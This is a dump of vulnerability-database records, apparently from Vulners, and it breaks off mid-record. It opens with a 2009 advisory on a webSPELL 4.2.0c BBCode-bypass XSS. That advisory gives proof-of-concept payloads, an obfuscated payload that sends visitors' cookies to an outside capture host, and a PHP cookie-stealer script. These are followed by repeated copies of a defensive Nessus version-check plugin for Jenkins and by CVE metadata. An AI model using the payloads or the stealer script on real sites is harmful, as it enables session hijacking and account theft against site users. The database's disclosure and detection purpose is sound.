{"id": "SECURITYVULNS:DOC:21677", "bulletinFamily": "software", "title": "webSPELL 4.2.0c--XSS (BYPASS BBCODE) COOKIES STEALING VULNERABILITY--", "description": "webSPELL 4.2.0c XSS (BYPASS BBCODE) COOKIES STEALING VULNERABILITY \r\n\r\n----------------\r\nCMS INFORMATION:\r\n----------------\r\n\r\n-->WEB: http://www.webspell.org/ (affected too)\r\n-->DOWNLOAD: http://www.webspell.org/download.php?fileID=22\r\n-->DEMO: http://www.webspell.org/index.php?site=demo\r\n-->CATEGORY: CMS / Portals\r\n-->DESCRIPTION: webSPELL is a free Content Management System (CMS) for clans and\r\n gaming communities, providing all needed features like forums, gallery, clanwar...\r\n\r\n-------------------\r\nCMS VULNERABILITY:\r\n-------------------\r\n\r\n-->TESTED ON: firefox 3.0.8 and IE 6.0.29 (Default)\r\n-->DORK: "Powered by webSPELL"\r\n-->CATEGORY: XSS/BYPASS-BBCODE/COOKIES STEALING \r\n-->AFFECT VERSION: LAST = 4.2.0C (maybe <= ?)\r\n-->Discovered Bug date: 2009-04-14\r\n-->Reported Bug date: 2009-04-14\r\n-->Fixed bug date: 2009-04-14\r\n-->Info patch (v-4.2.0d): http://www.webspell.org/\r\n-->Author: YEnH4ckEr\r\n-->mail: y3nh4ck3r[at]gmail[dot]com\r\n-->WEB/BLOG: N/A\r\n-->COMMENT: A mi novia Marijose...hermano,cu\u0441ada, padres (y amigos xD) por su apoyo.\r\n\r\n-----------\r\nBUG ZONES:\r\n-----------\r\n\r\n#BBCode is bypassed by differents methods and XSS is possible.\r\n\r\n----------------------------------\r\nPROOF OF CONCEPT (SEARCHING XSS):\r\n----------------------------------\r\n\r\nBOTH (FIREFOX AND IE):\r\n\r\n\r\n[email][img]http://a.com onmouseover=alert(1) [/img][/email]\r\n[email][email][img]http://a.com onmouseover=alert(1) [/img] [/email][/email]\r\n[email][url][img]http://a.com onmouseover=alert(1) [/img] [/url][/email]\r\n\r\nMaybe you find more...I looked for a bit xD\r\n\r\nONLY IE:\r\n\r\n[email][email][url]http://a.com onmouseover=alert(1) [/url]http://' onmouseover=alert(1) [/email][/email]\r\n[email][email][url]http://a.com' onmouseover=alert(1) [/url]http:// onmouseover=alert(1) [/email][/email]\r\n[email][email][url]http://a.com' onmouseover=alert(1) [/url]http:// ' onmouseover=alert(1) [/email][/email]\r\n[email][email][url]http://a.com' onmouseover=alert(1) [/url] ' onmouseover=alert(1) [/email][/email]\r\n[email][email][url]http://a.com onmouseover=alert(1) [/url] ' onmouseover=alert(1) [/email][/email]\r\n\r\nCombinations of tags like this: \r\n\r\n[email][img]http://a.com onmouseover=alert(1) [/img][/email]\r\n\r\nGenerate the follow html code:\r\n\r\n<a href="mailto:..."><img src=\"http://a.com onmouseover=alert(1) \" id=\"ws_image_123966998343_1\" border=\"0\"\r\nonload=\"checkSize('123966998343_1', 450, 500)\" alt=\"http://a.com onmouseover=alert(1) \" style=\"max-width: 451px;\r\nmax-height: 501px;\" /><div id=\"ws_imagediv_123966998343_1\" style=\"display:none;\"><a href='http://a.com\r\nonmouseover=alert(1) ' target='_blank'><i>(Auto resize: show original)</i></a></div></a>\r\n\r\n\r\n--------------------------\r\nCOOKIES EXPLOIT (BBCODE):\r\n--------------------------\r\n\r\nI'll use the first PoC (IE6 and firefox) and String.fromCharCode \r\nto bypass quotes and send cookies to my host:\r\n\r\nhttp://www.myphpcookiestealing.es/capturethecookies.php?ck=\r\n\r\nWell...Let's GO!\r\n\r\n[email][img]http://www.victim.es\r\nonmouseover=document.location=String.fromCharCode(104,116,116,112,58,47,47,119,119,119,46,109,121,112,104,112,99,111,111,107,105,101,115,116,101,97,108,105,110,103,46,101,115,47,99,97,112,116,117,114,101,116,104,101,99,111,111,107,105,101,115,46,112,104,112,63,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61)+document.cookie\r\n[/img][/email]\r\n\r\n------------------------------\r\nCOOKIES STEALER (PHP SCRIPT):\r\n------------------------------\r\n\r\n<?php\r\n$ck=$_GET["ck"]; //Capture the cookies \r\n$manejador=fopen("exploited.txt",'a'); //Open cookies saved file\r\nfwrite($manejador, "Cookie:\r\n".htmlentities($ck)."\r\n--EOF--\r\n"); //Save the values\r\nfclose($manejador); //Close file\r\necho "<script>location.href='http://[HOST]/[PATH]/index.php?module';</script>"; //Redirect...we don't want to alert xDD\r\n?>\r\n\r\nYou can use any cookie editor and you have one shot (XSSSHEll+XSSTunnel = many shots)", "published": "2009-04-17T00:00:00", "modified": "2009-04-17T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:21677", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:30", "edition": 1, "viewCount": 3277, "enchantments": {"score": {"value": 5.8, "vector": "NONE", "modified": "2018-08-31T11:10:30", "rev": 2}, "dependencies": {"references": [{"type": "mskb", "idList": ["KB3172532"]}, {"type": "cve", "idList": ["CVE-2015-9286", "CVE-2008-7272", "CVE-2014-2595", "CVE-2008-7273"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:32658", "SECURITYVULNS:VULN:14754", "SECURITYVULNS:DOC:32660", "SECURITYVULNS:DOC:32654", "SECURITYVULNS:DOC:32651", "SECURITYVULNS:VULN:14720", "SECURITYVULNS:VULN:14755", "SECURITYVULNS:DOC:32652", "SECURITYVULNS:DOC:32657", "SECURITYVULNS:VULN:14753"]}], "modified": "2018-08-31T11:10:30", "rev": 2}, "vulnersScore": 5.8}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}}

{"nessus": [{"id": "CLOUDBEES_SECURITY_ADVISORY_2021-08-31.NASL", "hash": "21c0850b0c7a068b7e63a155a3ce9975", "type": "nessus", "bulletinFamily": "scanner", "title": "Jenkins Enterprise and Operations Center < 2.249.32.0.2 / 2.277.41.0.2 / 2.303.1.6 Multiple Vulnerabilities (CloudBees Security Advisory 2021-08-31)", "description": "The version of Jenkins Enterprise or Jenkins Operations Center running on the remote web server is 2.x prior to 2.303.1.6, 2.249.x prior to 2.249.32.0.2, or 2.277.x prior to 2.277.41.0.2. It is, therefore, affected by multiple vulnerabilities, including the following:\n\n - Jenkins Code Coverage API Plugin 1.4.0 and earlier does not apply Jenkins JEP-200 deserialization protection to Java objects it deserializes from disk, resulting in a remote code execution vulnerability.\n (CVE-2021-21677)\n\n - Jenkins SAML Plugin 2.0.7 and earlier allows attackers to craft URLs that would bypass the CSRF protection of any target URL in Jenkins. (CVE-2021-21678)\n\n - Jenkins Azure AD Plugin 179.vf6841393099e and earlier allows attackers to craft URLs that would bypass the CSRF protection of any target URL in Jenkins. (CVE-2021-21679)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "published": "2021-10-06T00:00:00", "modified": "2021-10-12T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/153890", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21681", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21680", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21677", "https://www.cloudbees.com/cloudbees-security-advisory-2021-08-31", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21678", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21679"], "cvelist": ["CVE-2021-21677", "CVE-2021-21678", "CVE-2021-21679", "CVE-2021-21680", "CVE-2021-21681"], "immutableFields": [], "lastseen": "2021-10-12T23:36:36", "history": [{"bulletin": {"id": "CLOUDBEES_SECURITY_ADVISORY_2021-08-31.NASL", "hash": "ce4e670d7c91243ed6d9ef84f9e14d0d", "type": "nessus", "bulletinFamily": "scanner", "title": "Jenkins Enterprise and Operations Center < 2.249.32.0.2 / 2.277.41.0.2 / 2.303.1.6 Multiple Vulnerabilities (CloudBees Security Advisory 2021-08-31)", "description": "The version of Jenkins Enterprise or Jenkins Operations Center running on the remote web server is 2.x prior to 2.303.1.6, 2.249.x prior to 2.249.32.0.2, or 2.277.x prior to 2.277.41.0.2. It is, therefore, affected by multiple vulnerabilities, including the following:\n\n - Jenkins Code Coverage API Plugin 1.4.0 and earlier does not apply Jenkins JEP-200 deserialization protection to Java objects it deserializes from disk, resulting in a remote code execution vulnerability.\n (CVE-2021-21677)\n\n - Jenkins SAML Plugin 2.0.7 and earlier allows attackers to craft URLs that would bypass the CSRF protection of any target URL in Jenkins. (CVE-2021-21678)\n\n - Jenkins Azure AD Plugin 179.vf6841393099e and earlier allows attackers to craft URLs that would bypass the CSRF protection of any target URL in Jenkins. (CVE-2021-21679)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "published": "2021-10-06T00:00:00", "modified": "2021-10-06T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/153890", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://www.cloudbees.com/cloudbees-security-advisory-2021-08-31", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21681", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21679", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21677", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21680", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21678"], "cvelist": ["CVE-2021-21677", "CVE-2021-21678", "CVE-2021-21679", "CVE-2021-21680", "CVE-2021-21681"], "immutableFields": [], "lastseen": "2021-10-07T00:05:34", "history": [], "viewCount": 6, "enchantments": {}, "objectVersion": "1.6", "pluginID": "153890", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153890);\n script_version(\"1.1\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/10/06\");\n\n script_cve_id(\n \"CVE-2021-21677\",\n \"CVE-2021-21678\",\n \"CVE-2021-21679\",\n \"CVE-2021-21680\",\n \"CVE-2021-21681\"\n );\n\n script_name(english:\"Jenkins Enterprise and Operations Center < 2.249.32.0.2 / 2.277.41.0.2 / 2.303.1.6 Multiple Vulnerabilities (CloudBees Security Advisory 2021-08-31)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A job scheduling and management system hosted on the remote web server is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Jenkins Enterprise or Jenkins Operations Center running on the remote web server is 2.x prior to\n2.303.1.6, 2.249.x prior to 2.249.32.0.2, or 2.277.x prior to 2.277.41.0.2. It is, therefore, affected by multiple\nvulnerabilities, including the following:\n\n - Jenkins Code Coverage API Plugin 1.4.0 and earlier does not apply Jenkins JEP-200 deserialization\n protection to Java objects it deserializes from disk, resulting in a remote code execution vulnerability.\n (CVE-2021-21677)\n\n - Jenkins SAML Plugin 2.0.7 and earlier allows attackers to craft URLs that would bypass the CSRF protection\n of any target URL in Jenkins. (CVE-2021-21678)\n\n - Jenkins Azure AD Plugin 179.vf6841393099e and earlier allows attackers to craft URLs that would bypass the\n CSRF protection of any target URL in Jenkins. (CVE-2021-21679)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.cloudbees.com/cloudbees-security-advisory-2021-08-31\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade Jenkins Enterprise or Jenkins Operations Center to version 2.249.32.0.2, 2.277.41.0.2, 2.303.1.6 or later.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21678\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/31\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/08/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/10/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cloudbees:jenkins\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"jenkins_detect.nasl\", \"jenkins_win_installed.nbin\", \"jenkins_nix_installed.nbin\", \"macosx_jenkins_installed.nbin\");\n script_require_keys(\"installed_sw/Jenkins\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\nvar app_info = vcf::combined_get_app_info(app:'Jenkins');\n\nvar constraints = [\n { 'min_version' : '2.249', 'fixed_version' : '2.249.32.0.2', 'edition' : 'Enterprise' },\n { 'min_version' : '2.277', 'fixed_version' : '2.277.41.0.2', 'edition' : 'Enterprise' },\n { 'min_version' : '2', 'fixed_version' : '2.303.1.6', 'edition' : 'Enterprise', 'rolling_train' : TRUE },\n { 'min_version' : '2.249', 'fixed_version' : '2.249.32.0.2', 'edition' : 'Operations Center' },\n { 'min_version' : '2.277', 'fixed_version' : '2.277.41.0.2', 'edition' : 'Operations Center' },\n { 'min_version' : '2', 'fixed_version' : '2.303.1.6', 'edition' : 'Operations Center', 'rolling_train' : TRUE }\n];\n\nvcf::jenkins::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_WARNING,\n flags:{'xsrf':TRUE}\n);\n", "naslFamily": "CGI abuses", "cpe": ["cpe:/a:cloudbees:jenkins"], "solution": "Upgrade Jenkins Enterprise or Jenkins Operations Center to version 2.249.32.0.2, 2.277.41.0.2, 2.303.1.6 or later.", "nessusSeverity": "Medium", "cvssScoreSource": "CVE-2021-21678", "vpr": {"risk factor": "Medium", "score": "5.9"}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": "2021-08-31T00:00:00", "vulnerabilityPublicationDate": "2021-08-31T00:00:00", "exploitableWith": []}, "lastseen": "2021-10-07T00:05:34", "differentElements": ["cvssScoreSource", "exploitEase", "modified", "sourceData"], "edition": 1}, {"bulletin": {"id": "CLOUDBEES_SECURITY_ADVISORY_2021-08-31.NASL", "hash": "e568a5f2d6f03bdea09387a7145cd522", "type": "nessus", "bulletinFamily": "scanner", "title": "Jenkins Enterprise and Operations Center < 2.249.32.0.2 / 2.277.41.0.2 / 2.303.1.6 Multiple Vulnerabilities (CloudBees Security Advisory 2021-08-31)", "description": "The version of Jenkins Enterprise or Jenkins Operations Center running on the remote web server is 2.x prior to 2.303.1.6, 2.249.x prior to 2.249.32.0.2, or 2.277.x prior to 2.277.41.0.2. It is, therefore, affected by multiple vulnerabilities, including the following:\n\n - Jenkins Code Coverage API Plugin 1.4.0 and earlier does not apply Jenkins JEP-200 deserialization protection to Java objects it deserializes from disk, resulting in a remote code execution vulnerability.\n (CVE-2021-21677)\n\n - Jenkins SAML Plugin 2.0.7 and earlier allows attackers to craft URLs that would bypass the CSRF protection of any target URL in Jenkins. (CVE-2021-21678)\n\n - Jenkins Azure AD Plugin 179.vf6841393099e and earlier allows attackers to craft URLs that would bypass the CSRF protection of any target URL in Jenkins. (CVE-2021-21679)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "published": "2021-10-06T00:00:00", "modified": "2021-10-07T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/153890", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21677", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21679", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21680", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21681", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21678", "https://www.cloudbees.com/cloudbees-security-advisory-2021-08-31"], "cvelist": ["CVE-2021-21677", "CVE-2021-21678", "CVE-2021-21679", "CVE-2021-21680", "CVE-2021-21681"], "immutableFields": [], "lastseen": "2021-10-08T11:40:13", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-21678", "CVE-2021-21679", "CVE-2021-21681", "CVE-2021-21680", "CVE-2021-21677"]}], "modified": "2021-10-08T11:40:13", "rev": 2}, "score": {"value": 6.2, "vector": "NONE", "modified": "2021-10-08T11:40:13", "rev": 2}}, "objectVersion": "1.6", "pluginID": "153890", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153890);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/10/07\");\n\n script_cve_id(\n \"CVE-2021-21677\",\n \"CVE-2021-21678\",\n \"CVE-2021-21679\",\n \"CVE-2021-21680\",\n \"CVE-2021-21681\"\n );\n\n script_name(english:\"Jenkins Enterprise and Operations Center < 2.249.32.0.2 / 2.277.41.0.2 / 2.303.1.6 Multiple Vulnerabilities (CloudBees Security Advisory 2021-08-31)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A job scheduling and management system hosted on the remote web server is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Jenkins Enterprise or Jenkins Operations Center running on the remote web server is 2.x prior to\n2.303.1.6, 2.249.x prior to 2.249.32.0.2, or 2.277.x prior to 2.277.41.0.2. It is, therefore, affected by multiple\nvulnerabilities, including the following:\n\n - Jenkins Code Coverage API Plugin 1.4.0 and earlier does not apply Jenkins JEP-200 deserialization\n protection to Java objects it deserializes from disk, resulting in a remote code execution vulnerability.\n (CVE-2021-21677)\n\n - Jenkins SAML Plugin 2.0.7 and earlier allows attackers to craft URLs that would bypass the CSRF protection\n of any target URL in Jenkins. (CVE-2021-21678)\n\n - Jenkins Azure AD Plugin 179.vf6841393099e and earlier allows attackers to craft URLs that would bypass the\n CSRF protection of any target URL in Jenkins. (CVE-2021-21679)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.cloudbees.com/cloudbees-security-advisory-2021-08-31\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade Jenkins Enterprise or Jenkins Operations Center to version 2.249.32.0.2, 2.277.41.0.2, 2.303.1.6 or later.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21679\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/31\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/08/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/10/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cloudbees:jenkins\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"jenkins_detect.nasl\", \"jenkins_win_installed.nbin\", \"jenkins_nix_installed.nbin\", \"macosx_jenkins_installed.nbin\");\n script_require_keys(\"installed_sw/Jenkins\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\nvar app_info = vcf::combined_get_app_info(app:'Jenkins');\n\nvar constraints = [\n { 'min_version' : '2.249', 'fixed_version' : '2.249.32.0.2', 'edition' : 'Enterprise' },\n { 'min_version' : '2.277', 'fixed_version' : '2.277.41.0.2', 'edition' : 'Enterprise' },\n { 'min_version' : '2', 'fixed_version' : '2.303.1.6', 'edition' : 'Enterprise', 'rolling_train' : TRUE },\n { 'min_version' : '2.249', 'fixed_version' : '2.249.32.0.2', 'edition' : 'Operations Center' },\n { 'min_version' : '2.277', 'fixed_version' : '2.277.41.0.2', 'edition' : 'Operations Center' },\n { 'min_version' : '2', 'fixed_version' : '2.303.1.6', 'edition' : 'Operations Center', 'rolling_train' : TRUE }\n];\n\nvcf::jenkins::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_WARNING,\n flags:{'xsrf':TRUE}\n);\n", "naslFamily": "CGI abuses", "cpe": ["cpe:/a:cloudbees:jenkins"], "solution": "Upgrade Jenkins Enterprise or Jenkins Operations Center to version 2.249.32.0.2, 2.277.41.0.2, 2.303.1.6 or later.", "nessusSeverity": "Medium", "cvssScoreSource": "CVE-2021-21679", "vpr": {"risk factor": "Medium", "score": "5.9"}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2021-08-31T00:00:00", "vulnerabilityPublicationDate": "2021-08-31T00:00:00", "exploitableWith": []}, "lastseen": "2021-10-08T11:40:13", "differentElements": ["modified", "sourceData"], "edition": 2}], "viewCount": 14, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-21681", "CVE-2021-21680", "CVE-2021-21677", "CVE-2021-21679", "CVE-2021-21678"]}], "modified": "2021-10-12T23:36:36", "rev": 2}, "score": {"value": 6.2, "vector": "NONE", "modified": "2021-10-12T23:36:36", "rev": 2}}, "objectVersion": "1.6", "pluginID": "153890", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153890);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/10/12\");\n\n script_cve_id(\n \"CVE-2021-21677\",\n \"CVE-2021-21678\",\n \"CVE-2021-21679\",\n \"CVE-2021-21680\",\n \"CVE-2021-21681\"\n );\n\n script_name(english:\"Jenkins Enterprise and Operations Center < 2.249.32.0.2 / 2.277.41.0.2 / 2.303.1.6 Multiple Vulnerabilities (CloudBees Security Advisory 2021-08-31)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A job scheduling and management system hosted on the remote web server is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Jenkins Enterprise or Jenkins Operations Center running on the remote web server is 2.x prior to\n2.303.1.6, 2.249.x prior to 2.249.32.0.2, or 2.277.x prior to 2.277.41.0.2. It is, therefore, affected by multiple\nvulnerabilities, including the following:\n\n - Jenkins Code Coverage API Plugin 1.4.0 and earlier does not apply Jenkins JEP-200 deserialization\n protection to Java objects it deserializes from disk, resulting in a remote code execution vulnerability.\n (CVE-2021-21677)\n\n - Jenkins SAML Plugin 2.0.7 and earlier allows attackers to craft URLs that would bypass the CSRF protection\n of any target URL in Jenkins. (CVE-2021-21678)\n\n - Jenkins Azure AD Plugin 179.vf6841393099e and earlier allows attackers to craft URLs that would bypass the\n CSRF protection of any target URL in Jenkins. (CVE-2021-21679)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.cloudbees.com/cloudbees-security-advisory-2021-08-31\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade Jenkins Enterprise or Jenkins Operations Center to version 2.249.32.0.2, 2.277.41.0.2, 2.303.1.6 or later.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21679\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/31\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/08/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/10/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cloudbees:jenkins\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"jenkins_detect.nasl\", \"jenkins_win_installed.nbin\", \"jenkins_nix_installed.nbin\", \"macosx_jenkins_installed.nbin\");\n script_require_keys(\"installed_sw/Jenkins\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\nvar app_info = vcf::combined_get_app_info(app:'Jenkins');\n\nvar constraints = [\n { 'min_version' : '2.249', 'fixed_version' : '2.249.32.0.2', 'edition' : make_list('Enterprise', 'Operations Center') },\n { 'min_version' : '2.277', 'fixed_version' : '2.277.41.0.2', 'edition' : make_list('Enterprise', 'Operations Center') },\n { 'min_version' : '2', 'fixed_version' : '2.303.1.6', 'edition' : make_list('Enterprise', 'Operations Center'), 'rolling_train' : TRUE }\n];\n\nvcf::jenkins::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_WARNING,\n flags:{'xsrf':TRUE}\n);\n", "naslFamily": "CGI abuses", "cpe": ["cpe:/a:cloudbees:jenkins"], "solution": "Upgrade Jenkins Enterprise or Jenkins Operations Center to version 2.249.32.0.2, 2.277.41.0.2, 2.303.1.6 or later.", "nessusSeverity": "Medium", "cvssScoreSource": "CVE-2021-21679", "vpr": {"risk factor": "Medium", "score": "5.9"}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2021-08-31T00:00:00", "vulnerabilityPublicationDate": "2021-08-31T00:00:00", "exploitableWith": [], "_object_type": "robots.models.nessus.NessusBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.nessus.NessusBulletin"]}], "cve": [{"id": "CVE-2021-21677", "bulletinFamily": "NVD", "title": "CVE-2021-21677", "description": "Jenkins Code Coverage API Plugin 1.4.0 and earlier does not apply Jenkins JEP-200 deserialization protection to Java objects it deserializes from disk, resulting in a remote code execution vulnerability.", "published": "2021-08-31T14:15:00", "modified": "2021-09-08T15:30:00", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21677", "reporter": "jenkinsci-cert@googlegroups.com", "references": ["https://www.jenkins.io/security/advisory/2021-08-31/#SECURITY-2376", "http://www.openwall.com/lists/oss-security/2021/08/31/1"], "cvelist": ["CVE-2021-21677"], "immutableFields": [], "type": "cve", "lastseen": "2021-09-09T07:25:47", "history": [{"bulletin": {"affectedConfiguration": [], "affectedSoftware": [], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": []}, "cvelist": ["CVE-2021-21677"], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "cwe": ["CWE-502"], "description": "Jenkins Code Coverage API Plugin 1.4.0 and earlier does not apply Jenkins JEP-200 deserialization protection to Java objects it deserializes from disk, resulting in a remote code execution vulnerability.", "edition": 1, "enchantments": {"dependencies": {"modified": "2021-09-01T09:55:25", "references": [], "rev": 2}, "score": {"modified": "2021-09-01T09:55:25", "rev": 2, "value": 4.3, "vector": "NONE"}}, "extraReferences": [{"name": "https://www.jenkins.io/security/advisory/2021-08-31/#SECURITY-2376", "refsource": "CONFIRM", "tags": [], "url": "https://www.jenkins.io/security/advisory/2021-08-31/#SECURITY-2376"}, {"name": "[oss-security] 20210831 Multiple vulnerabilities in Jenkins plugins", "refsource": "MLIST", "tags": [], "url": "http://www.openwall.com/lists/oss-security/2021/08/31/1"}], "hash": "ee259b1bb3d1551b1b4a27b93637fafe8c51ef146051ae3ba65ec2c871880390", "hashmap": 